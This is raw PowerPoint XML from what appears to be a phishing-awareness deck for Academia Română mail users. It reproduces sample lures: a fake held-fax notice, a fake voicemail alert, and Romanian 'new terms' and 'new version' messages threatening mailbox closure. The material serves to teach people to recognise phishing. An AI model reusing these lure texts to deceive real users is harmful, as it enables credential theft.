                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>] </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sent:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> vineri, 31 martie 2023 17:36</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>To:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> user@acad.ro</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Subject:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Incoming Fax Message - OnHold</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="600">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Flowchart: Process 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5925312" y="1943099"/>
            <a:ext cx="5791200"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2449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797296" y="1943099"/>
            <a:ext cx="591921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5" name="Flowchart: Process 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435864" y="1943099"/>
            <a:ext cx="514197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(9)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3007876957"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1027493" y="2479612"/>
          <a:ext cx="3934651" cy="2171700"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3934651">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="5080" marR="5080">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Dear user@acad.ro,</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="5080" marR="5080">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="5080" marR="5080">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>You have 8 incoming pending messages as of 3/29/2023 9:31:14 a.m. which are listed below along with the actions that can be taken:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="5080" marR="5080">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1800" u="none">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="5080" marR="5080">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" u="sng">
                          <a:solidFill>
                            <a:srgbClr val="0000E9"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Release to Mailbox </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:solidFill>
                            <a:srgbClr val="0000E9"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>    Upgrade Mail Quota      Add to Tasks</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="5080" marR="5080">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Helvetica Neue"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="5080" marR="5080">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Further information:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="5080" marR="5080">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Receiver:  user@acad.ro</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="5080" marR="5080">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Time and Date held: 3/29/2023 9:31:14 a.m.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="9525" anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="5080" marR="5080">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="535353"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The system generated this notice on 3/29/2023 9:31:14 a.m.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="5080" marR="5080">
                        <a:spcAft>
                          <a:spcPts val="900"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:effectLst/>
                          <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Do not reply to this automated message.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="9525" marR="9525" marT="9525" marB="9525"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Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6333744" y="2300042"/>
            <a:ext cx="4687824" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dear user ,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You have 13 Received new messages in your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VoiceMail box </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Duration: 01:14 Second(s)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Listen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>acad.ro ® Message Center (c) 2023</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4222817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547725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(10)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="742188" y="2310224"/>
            <a:ext cx="4864608" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Începând cu 15.03.2023, Academia Română Mail nu va mai folosi aplicații terțe (cum ar fi aplicațiile de e-mail, calendar sau de contact ale terților) folosind metode de conectare expirate. Cu alte cuvinte, ne-am schimbat recent termenii și condițiile și vom închide toate adresele de e-mail folosind vechile noastre servicii. Aceasta înseamnă pur și simplu că contul tău de e-mail va fi întrerupt după 15.03.2023. Dacă doriți să continuați să utilizați serviciile noastre de e-mail, vă rugăm să acceptați noii noștri termeni pentru a evita închiderea e-mailului.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vă recomandăm să începeți procesul citind instrucțiunile de mai jos:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NOI TERMENI</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dacă ați făcut deja modificările necesare pentru contul dvs., apreciem acțiunea rapidă!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Salutări,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Academia Română</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6152816" y="2240477"/>
            <a:ext cx="5457992" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Începând cu 01.09.2023, Academia Română Mail nu va mai folosi aplicații terță parte (cum ar fi aplicațiile de e-mail, calendar sau de contact ale terților) folosind metode de conectare expirate. Cu alte cuvinte, ne-am schimbat recent termenii și condițiile și vom închide toate adresele de e-mail folosind vechile noastre servicii. Aceasta înseamnă pur și simplu contul dvs. de e-mail va fi întrerupt după 01.09.2023. Dacă doriți să continuați să utilizați serviciile noastre de e-mail, vă rugăm să acceptați noii noștri termeni pentru a evita închiderea e-mailului.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vă recomandăm să începeți procesul citind instrucțiunile de mai jos:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NOI TERMENI</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  Dacă ați făcut deja modificările necesare pentru contul dvs., apreciem acțiunea rapidă!</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Toate cele bune,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Academia Română</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Flowchart: Process 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6065520" y="1943099"/>
            <a:ext cx="5650992"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281772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(11)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="816864" y="2376529"/>
            <a:ext cx="6096000" cy="3108543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Academia Română (sara. forsman @ bahnhof . se)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dragă utilizatorule</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Închidem toate versiunile vechi ale căsuței noastre poștale începând cu 5 decembrie 2022.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vă rugăm să urmați pagina de mai jos pentru a vă actualiza contul:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Versiune noua</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
